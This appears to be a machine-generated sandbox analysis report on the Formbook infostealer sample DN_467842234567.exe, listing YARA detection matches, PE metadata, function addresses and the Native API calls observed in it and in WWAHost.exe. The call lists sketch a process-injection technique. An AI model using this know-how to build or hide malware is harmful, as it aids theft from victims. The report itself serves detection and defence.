          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DN_467842234567.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00406354
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00404802
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00406B2B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_72915CF1
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_72915CE2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041C8F4
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B8B3
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041C266
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004012FB
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00408C70
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041C431
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B090
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C528EC
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C520A8
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41002
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C5E824
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8F900
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C522AE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBEBB0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4DBD2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C52B28
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4D466
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9841F
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C525DD
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9D5E0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C51D55
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B80D20
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C52D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03866E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03840D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03911D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057C8F4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B8B3
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057C266
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00568C70
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00568C6B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057C431
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00562D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00562FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0384B150 appears 32 times
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: String function: 00B8B150 appears 34 times
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004185CA NtCreateFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418622 NtCreateFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004186FA NtClose,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BCB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BCA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BCAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005785D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578680 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578700 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005787B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005785CA NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578622 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005786FA NtClose,
